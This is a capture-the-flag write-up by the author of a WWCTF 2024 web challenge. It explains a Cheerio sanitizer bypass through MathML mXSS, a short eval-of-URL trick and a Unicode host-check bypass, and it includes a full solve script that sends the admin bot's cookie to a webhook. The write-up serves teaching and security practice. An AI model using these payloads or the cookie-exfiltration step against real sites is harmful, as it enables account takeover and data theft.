SAAS MXSS challenge writeup from WWCTF 2024
Description
I created this challenge for WWCTF 2024. Participants have to find and exploit two distinct vulnerabilities. The first is bypassing a Cheerio-based server-side HTML sanitizer to achieve XSS through an HTML input. The second is abusing a logic flaw in the report endpoint so that the admin bot visits the malicious link.
Challenge overview
By the end of the CTF, this challenge had only two solves. Kudos to Kabilan S for achieving the first blood and Infobahn for securing the second blood!
Let’s check the remote application. Here we can enter HTML in the text box and see it reflected back in the HTML output.
Let’s look at the JavaScript behind this application:
async function sanitizeHTML() {
    const inputHTML = document.getElementById('html-input').value;
    if (inputHTML.length <= 75) {
        try {
            const response = await fetch('/api/sanitize', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ html: inputHTML })
            });
            const data = await response.json();
            if (data.html) {
                document.getElementById('sanitized-output').innerHTML = data.html;
            } else {
                document.getElementById('sanitized-output').textContent = `Error: ${data.error}`;
            }
        } catch (err) {
            document.getElementById('sanitized-output').textContent = `Failed to sanitize HTML: ${err.message}`;
        }
    } else {
        document.getElementById('sanitized-output').innerHTML = "<h1>Too Long</h1>";
    }
}
function sharePage() {
    const inputHTML = document.getElementById('html-input').value;
    const base64HTML = btoa(unescape(encodeURIComponent(inputHTML)));
    const newURL = `${window.location.origin + window.location.pathname}?html=${encodeURIComponent(base64HTML)}`;
    window.location.href = newURL
}
window.onload = () => {
    const urlParams = new URLSearchParams(window.location.search);
    const base64HTML = urlParams.get('html');
    if (base64HTML) {
        const decodedHTML = decodeURIComponent(escape(atob(base64HTML)));
        document.getElementById('html-input').value = decodedHTML;
        sanitizeHTML();
    }
}
Whenever you click the “Sanitize HTML” button, the sanitizeHTML function is triggered. It first checks that the input is at most 75 characters long. If it is, the HTML input is sent to /api/sanitize, and the response is written into the sanitized output using innerHTML. The window.onload handler does the same for a Base64-encoded html query parameter, which is what makes a payload shareable as a link.
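The share link can also be built outside the browser. The following is a minimal Python sketch of what sharePage and window.onload do with the html parameter, assuming ASCII input (where Python's len matches JavaScript's length); the origin example.test and the helper names are hypothetical and only there for illustration.

```python
import base64
from urllib.parse import quote, unquote

MAX_LEN = 75  # mirrors the `inputHTML.length <= 75` check in sanitizeHTML()


def build_share_url(origin: str, html: str) -> str:
    """Build a ?html= link the way sharePage() does (hypothetical helper)."""
    # btoa(unescape(encodeURIComponent(x))) is Base64 over the UTF-8 bytes.
    b64 = base64.b64encode(html.encode("utf-8")).decode("ascii")
    # Like encodeURIComponent, quote(..., safe="") escapes '+', '/' and '='.
    return f"{origin}/?html={quote(b64, safe='')}"


def decode_share_param(param: str) -> str:
    """Reverse step, like the window.onload handler (hypothetical helper)."""
    return base64.b64decode(unquote(param)).decode("utf-8")


html = "<test>hay</test>"
url = build_share_url("https://example.test", html)
param = url.split("html=", 1)[1]

print(url)
print(decode_share_param(param))
print("fits the length limit:", len(html) <= MAX_LEN)
```

Because the length check runs on the decoded input, the 75-character budget applies to the raw HTML, not to the Base64 string in the URL.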
We also have access to the source code, so let’s check it for more details. In docker-compose.yml you can see that there are two services, api and web:
services:
  api:
    build:
      context: ./backend
    ports:
      - "5000"
    env_file: ".env"
    environment:
      - NODE_ENV=production
  web:
    build:
      context: .
      dockerfile: Dockerfile
    ports:
      - "80:80"
    depends_on:
      - api
web is an nginx container that serves the HTML files from the frontend directory and routes /api to the api service. The api service has the following code; only the relevant parts are shown here:
/*
imports and SETUP
*/
const blacklist = "a abbr acronym address applet area article aside audio b base bdi bdo big blink blockquote br button canvas caption center cite code col colgroup command content data datalist dd del details dfn dialog dir div dl dt element em embed fieldset figcaption figure font footer form frame frameset head header hgroup hr html iframe image img input ins kbd keygen label legend li link listing main map mark marquee menu menuitem meta meter multicol nav nextid nobr noembed noframes noscript object ol optgroup p output p param picture plaintext pre progress s samp script section select shadow slot small source spacer span strike strong sub summary sup svg table tbody td template textarea tfoot th thead time tr track tt u ul var video".split(" ")
const attrs = "onafterprint onafterscriptexecute onanimationcancel onanimationend onanimationiteration onanimationstart onauxclick onbeforecopy autofocus onbeforecut onbeforeinput onbeforeprint onbeforescriptexecute onbeforetoggle onbeforeunload onbegin onblur oncanplay oncanplaythrough onchange onclick onclose oncontextmenu oncopy oncuechange oncut ondblclick ondrag ondragend ondragenter ondragexit ondragleave ondragover ondragstart ondrop ondurationchange onend onended onerror onfocus onfocus onfocusin onfocusout onformdata onfullscreenchange onhashchange oninput oninvalid onkeydown onkeypress onkeyup onload onloadeddata onloadedmetadata onloadstart onmessage onmousedown onmouseenter onmouseleave onmousemove onmouseout onmouseover onmouseup onmousewheel onmozfullscreenchange onpagehide onpageshow onpaste onpause onplay onplaying onpointercancel onpointerdown onpointerenter onpointerleave onpointermove onpointerout onpointerover onpointerrawupdate onpointerup onpopstate onprogress onratechange onrepeat onreset onresize onscroll onscrollend onsearch onseeked onseeking onselect onselectionchange onselectstart onshow onsubmit onsuspend ontimeupdate ontoggle ontoggle(popover) ontouchend ontouchmove ontouchstart ontransitioncancel ontransitionend ontransitionrun ontransitionstart onunhandledrejection onunload onvolumechange onwebkitanimationend onwebkitanimationiteration onwebkitanimationstart onwebkitmouseforcechanged onwebkitmouseforcedown onwebkitmouseforceup onwebkitmouseforcewillbegin onwebkitplaybacktargetavailabilitychanged onwebkittransitionend onwebkitwillrevealbottom onwheel".split(" ")
const generateChallenge = () => {
    const data = crypto.randomBytes(16).toString('hex');
    script = `POW` // proof of work
    return { script, data, difficulty: DIFFICULTY };
};
const sanitize = (html) => {
    const unsafe = cheerio.load(html);
    // Remove every blacklisted tag found under <body>
    for (const tag of blacklist) {
        unsafe(tag, "body").remove();
    }
    // Strip every blacklisted attribute from the remaining elements
    unsafe('*').each((_, el) => {
        for (const attr of attrs) {
            unsafe(el).removeAttr(attr);
        }
    });
    return unsafe("body").html();
}
app.post('/api/sanitize', async (req, res) => {
    try {
        const { html } = req.body;
        if (html) {
            const sanitizedHTML = sanitize(html);
            res.json({ html: sanitizedHTML });
        } else {
            res.status(400).json({ error: 'No HTML provided' });
        }
    } catch (err) {
        console.log(err)
        res.status(500).json({ error: 'Something went wrong' });
    }
});
app.get('/api/report', (req, res) => {
    // send POW challenge
});
app.post('/api/report', async (req, res) => {
    const { data, nonce, urlToVisit, secretKey } = req.body;
    if (!data || nonce === undefined || urlToVisit === undefined || secretKey === undefined) {
        return res.status(400).json({ success: false, error: 'Invalid request format.' });
    }
    const difficulty = activeChallenges.get(data);
    if (!difficulty) {
        return res.status(400).json({ success: false, error: 'Challenge not found or expired.' });
    }
    const isValid = validateSolution(data, nonce, difficulty);
    if (isValid) {
        activeChallenges.delete(data);
        try {
            const context = await (await browser).createBrowserContext();
            const page = await context.newPage();
            // Set cookie
            if (urlToVisit.includes(CHALL_DOMAIN)) {
                if (secretKey !== ACCESSKEY) {
                    return res.status(403).json({ success: false, error: 'secretKey is invalid you can not report' });
                }
            }
            const url = new URL(urlToVisit)
            if (url.host !== CHALL_DOMAIN) {
                return res.status(400).json({ success: false, error: 'Given URL is out of scope' });
            }
            try {
                // Visit the page
                return res.json({ success: true, message: 'Admin verified your report.' });
            } catch (error) {
                // Error handling
            }
        } catch (error) {
            // Error handling
        }
    }
    return res.status(400).json({ success: false, error: 'Invalid solution.' });
});
app.listen(PORT, async () => {
    console.log(`SaAS running at http://localhost:${PORT}`);
});
Let’s examine the /api/sanitize endpoint. It parses the input with cheerio, then removes the tags and attributes listed in the blacklists shown above.
Fortunately, the blacklist does not include the math tag, which makes it an excellent candidate for confusing parsers. Let’s explore some potential mXSS vectors using this tag.
Before trying to solve this, let’s set up a test script to check our mXSS vectors. I used the following code:
const cheerio = require('cheerio');
const html = "<test>hay</test>"
const $ = cheerio.load(html);
console.log($("body").html());
Identifying a Potential Payload
From the MXSS cheatsheet (available on SonarSource MXSS Cheatsheet), we can find potential payloads that could work around the blacklist. For instance, the following payload is a good candidate:
This payload triggers an alert in the browser through the onerror handler of an img element. However, some elements in this payload, like <table>, are blacklisted by the server, so we need to refine it.
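To see quickly which building blocks are usable, the tag names can be checked against the blacklist. This is a small Python sketch under the assumption that a plain name lookup is a fair proxy for what the sanitizer removes; the blacklist string is copied from the challenge source, and PAYLOAD_TAGS is just the set of tags that appear in the payloads discussed in this writeup.

```python
# Tag blacklist copied from the challenge's sanitizer source.
BLACKLIST = set((
    "a abbr acronym address applet area article aside audio b base bdi bdo "
    "big blink blockquote br button canvas caption center cite code col "
    "colgroup command content data datalist dd del details dfn dialog dir "
    "div dl dt element em embed fieldset figcaption figure font footer form "
    "frame frameset head header hgroup hr html iframe image img input ins "
    "kbd keygen label legend li link listing main map mark marquee menu "
    "menuitem meta meter multicol nav nextid nobr noembed noframes noscript "
    "object ol optgroup p output p param picture plaintext pre progress s "
    "samp script section select shadow slot small source spacer span strike "
    "strong sub summary sup svg table tbody td template textarea tfoot th "
    "thead time tr track tt u ul var video"
).split())

# Tags that appear in the payloads discussed in this writeup.
PAYLOAD_TAGS = ["math", "mtext", "mglyph", "style", "table", "img"]

blocked = [tag for tag in PAYLOAD_TAGS if tag in BLACKLIST]
allowed = [tag for tag in PAYLOAD_TAGS if tag not in BLACKLIST]

print("blocked:", blocked)
print("allowed:", allowed)
```

The lookup only says what the sanitizer would remove if it saw the tag as an element; img is blacklisted, so it has to reach the browser without ever being an element in the server-side tree.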
Refining the Payload
First, we simplify the payload by removing unnecessary parts, such as the table with the id attribute, and test it again:
Cheerio parses this and transforms it into:
<math><mtext><mglyph><style><math><img src=x onerror=alert(1)></style></mglyph><table></table></mtext></math>
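When you submit it as input to the application, the payload successfully triggers an alert in the browser, even though the server-side sanitizer removes blacklisted elements such as <table> at the end. As the output above shows, in Cheerio's tree the img tag is only text inside the style element, so the sanitizer never sees an img element or an onerror attribute to remove. When the browser re-parses the sanitized string through innerHTML, it builds a different tree in which the img becomes a real element and its onerror handler fires.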
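From the source code, we know the goal is to steal the cookie. However, the payload is limited to 75 characters. To get around this, we can use a well-known XSS trick that keeps the injected part short: eval(`'`+URL). Inside an inline event handler, URL resolves to document.URL, so prepending a quote turns the page address into the start of a JavaScript string literal. A fragment of the form #'+eval(...) then closes that string and appends arbitrary code. Since we control the URL that is sent to the bot, this is feasible.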
Here’s the code that generates a link capable of sending the token to your endpoint.
import base64
import requests
webhook = "YOUR_WEB_HOOK"
payload = f"window.location='{webhook}'+btoa(document.cookie)"
encoded_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
report_url = f"https://saas.wwctf.com/?html=PG1hdGg%2BPG10ZXh0Pjx0YWJsZT48bWdseXBoPjxzdHlsZT48bWF0aD48aW1nIHNyYz14IG9uZXJyb3I9ZXZhbChgJ2ArVVJMKT4%3D#'+eval(atob('{encoded_payload}'))"
print(report_url)
If you change the eval to alert, you can see the payload in action.
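To make the trick concrete, the following Python sketch decodes the html parameter used in the link above and rebuilds the JavaScript source text that eval(`'`+URL) ends up evaluating. The second-stage script and the attacker.example webhook are hypothetical placeholders, not the values used during the CTF.

```python
import base64
from urllib.parse import unquote

# The html parameter from the report link in this writeup.
HTML_PARAM = (
    "PG1hdGg%2BPG10ZXh0Pjx0YWJsZT48bWdseXBoPjxzdHlsZT48bWF0aD48"
    "aW1nIHNyYz14IG9uZXJyb3I9ZXZhbChgJ2ArVVJMKT4%3D"
)

# Step 1: what lands in the text box and is sent to /api/sanitize.
injected = base64.b64decode(unquote(HTML_PARAM)).decode("utf-8")
print(injected)
print("length:", len(injected))  # has to stay within the 75-character limit

# Step 2: the long part of the exploit lives in the URL fragment instead.
# Hypothetical second stage and webhook, for illustration only.
stage2 = "window.location='https://attacker.example/'+btoa(document.cookie)"
stage2_b64 = base64.b64encode(stage2.encode("utf-8")).decode("ascii")
url = f"https://saas.wwctf.com/?html={HTML_PARAM}#'+eval(atob('{stage2_b64}'))"

# Step 3: eval(`'`+URL) evaluates a quote followed by the page URL, i.e.
# a string literal (everything up to "#'") plus eval(atob('...')).
js_source = "'" + url
print(js_source)
```

The injected HTML stays the same no matter how long the second stage is, because only the fragment grows.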
We face a second issue when reporting: to make the bot visit our link, we must get past the following checks. urlToVisit is the URL we provide. If it contains the challenge domain, we must supply a secretKey that matches the randomly generated server-side ACCESSKEY. Since there is no way to know ACCESSKEY, this check cannot be satisfied. If we provide a URL from any other domain, the second check fails because it requires the URL’s host to match the challenge domain. Additionally, redirects cannot be used.
Here’s the code snippet implementing these checks:
if (urlToVisit.includes(CHALL_DOMAIN)) {
    if (secretKey !== ACCESSKEY) {
        return res.status(403).json({ success: false, error: 'secretKey is invalid you can not report' });
    }
}
const url = new URL(urlToVisit)
if (url.host !== CHALL_DOMAIN) {
    return res.status(400).json({ success: false, error: 'Given URL is out of scope' });
}
However, there is a logical flaw in the implementation: the includes method works on the raw string, while the URL object normalizes the host. If you put a Unicode character in the domain, such as 𝙎 instead of s, the includes check does not match, so the secretKey comparison is skipped, but the URL object normalizes the character back to s and the host check passes. This inconsistency lets you submit the URL to the bot successfully.
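The mismatch between the two checks can be illustrated with a short Python sketch. It is only an approximation: the real server uses JavaScript's String.includes and the WHATWG URL parser, whose host processing is stood in for here by NFKC normalization plus lowercasing, and the value of CHALL_DOMAIN is assumed to be saas.wwctf.com.

```python
import unicodedata
from urllib.parse import urlsplit

CHALL_DOMAIN = "saas.wwctf.com"  # assumed value of the server's CHALL_DOMAIN


def includes_check(url_to_visit: str) -> bool:
    """Mirrors urlToVisit.includes(CHALL_DOMAIN): a raw substring test."""
    return CHALL_DOMAIN in url_to_visit


def parsed_host(url_to_visit: str) -> str:
    """Rough stand-in for `new URL(urlToVisit).host`.

    Approximation: NFKC normalization plus lowercasing gives the same
    result as the URL parser's host mapping for this particular character.
    """
    host = urlsplit(url_to_visit).netloc
    return unicodedata.normalize("NFKC", host).lower()


# U+1D64E is MATHEMATICAL SANS-SERIF BOLD ITALIC CAPITAL S.
tricky = "https://\U0001D64Eaas.wwctf.com/?html=..."

print("secretKey required:", includes_check(tricky))
print("host after parsing:", parsed_host(tricky))
print("in scope:", parsed_host(tricky) == CHALL_DOMAIN)
```

The first check never asks for the secretKey because the raw string does not contain the domain, while the second check sees the normalized host and accepts the URL.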
Final solve script
import base64
import hashlib
import time
from multiprocessing import Pool

import requests


def find_nonce(args):
    # Search one chunk of the nonce space for a hash with the required prefix.
    message, nonce_start, nonce_end, prefix = args
    for nonce in range(nonce_start, nonce_end):
        combined = f'{message}{nonce}'.encode()
        hash_result = hashlib.sha256(combined).hexdigest()
        if hash_result.startswith(prefix):
            return nonce
    return None


def proof_of_work(message):
    prefix = '0'*6
    nonce = 0
    num_processes = 1
    chunk_size = 1000000
    start_time = time.time()
    with Pool(processes=num_processes) as pool:
        while True:
            tasks = [
                (message, nonce + i * chunk_size, nonce + (i + 1) * chunk_size, prefix)
                for i in range(num_processes)
            ]
            results = pool.map(find_nonce, tasks)
            for result in results:
                if result is not None:
                    end_time = time.time()
                    nonce = result
                    print(f'Time taken: {end_time - start_time} seconds')
                    return nonce
            nonce += num_processes * chunk_size


# Everything below stays under the main guard so that worker processes
# started by multiprocessing do not re-run the exploit on import.
if __name__ == "__main__":
    print("Working....")
    data = "dae016e1c3d8fe84176a6d7691f57fdb"  # get the pow data from /api/report
    nonce = proof_of_work(data)
    print(nonce)

    ############## The above code is for POW ################
    ############## SOLUTION code ################
    webhook = "WEBHOOK URL"
    payload = f"window.location='{webhook}'+btoa(document.cookie)"
    encoded_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
    report_url = f"https://𝙎aas.wwctf.com/?html=PG1hdGg%2BPG10ZXh0Pjx0YWJsZT48bWdseXBoPjxzdHlsZT48bWF0aD48aW1nIHNyYz14IG9uZXJyb3I9ZXZhbChgJ2ArVVJMKT4%3D#'+eval(atob('{encoded_payload}'))"
    print(report_url)
    resp = requests.post("https://saas.wwctf.com/api/report", json={
        "secretKey": "asdsd",
        "urlToVisit": report_url,
        "nonce": nonce,
        "data": data
    })
    print(resp.text)
The request from the bot:
https://webhook.site/YOUR-ID/ZmxhZz13d2Z7SFRNTF9yMFVOZFRSMVBfZjByX3RIM19XMU5fNE5kX1MzUlYzUl81SUQzX0g3TUxfUzROMVQxWjRUSTBOXzFTX0I0RF8xRDM0fQ==
Base64-decoding the last path segment gives the cookie, which contains the flag wwf{HTML_r0UNdTR1P_f0r_tH3_W1N_4Nd_S3RV3R_5ID3_H7ML_S4N1T1Z4TI0N_1S_B4D_1D34}
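The decoding step is a one-liner; here is a minimal Python sketch, assuming the exfiltrated value is the last path segment of the webhook request shown above.

```python
import base64
from urllib.parse import urlsplit

# The request received on the webhook, as shown above.
request_url = (
    "https://webhook.site/YOUR-ID/"
    "ZmxhZz13d2Z7SFRNTF9yMFVOZFRSMVBfZjByX3RIM19XMU5fNE5kX1MzUlYzUl81"
    "SUQzX0g3TUxfUzROMVQxWjRUSTBOXzFTX0I0RF8xRDM0fQ=="
)

# The payload appended btoa(document.cookie) to the webhook URL, so the
# Base64 data is the last path segment.
encoded = urlsplit(request_url).path.rsplit("/", 1)[-1]
cookie = base64.b64decode(encoded).decode("utf-8")
print(cookie)
```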
The vulnerability here is similar to CVE-2024-52595, which is a namespace confusion sanitizer bypass in the Python package lxml-html-clean.
Community solutions
Check out Kabin’s writeup, where he used a URL-encoded input like saas.wwctf%2ecom to bypass the report URL check.
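The percent-encoded variant relies on the same mismatch between the raw string and the parsed host. A small Python sketch of the idea, assuming CHALL_DOMAIN is saas.wwctf.com and using unquote as a stand-in for the percent-decoding that the URL parser applies to the host:

```python
from urllib.parse import unquote, urlsplit

CHALL_DOMAIN = "saas.wwctf.com"  # assumed value of the server's CHALL_DOMAIN

url_to_visit = "https://saas.wwctf%2ecom/?html=..."

# Raw substring test, like urlToVisit.includes(CHALL_DOMAIN).
needs_secret = CHALL_DOMAIN in url_to_visit

# Stand-in for new URL(urlToVisit).host: the host is percent-decoded.
raw_host = urlsplit(url_to_visit).netloc
decoded_host = unquote(raw_host)

print("secretKey required:", needs_secret)
print("raw host:", raw_host)
print("decoded host:", decoded_host)
```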
Team Infobahn’s solution utilized the fact that xhr and style tags behave the same way when used in the MathML namespace. Additionally, within the MathML namespace, it is possible to load iframes.
Feel free to ping me on LinkedIn if you spot any inaccuracies in this blog.
References
Check the following blogs to learn more about MXSS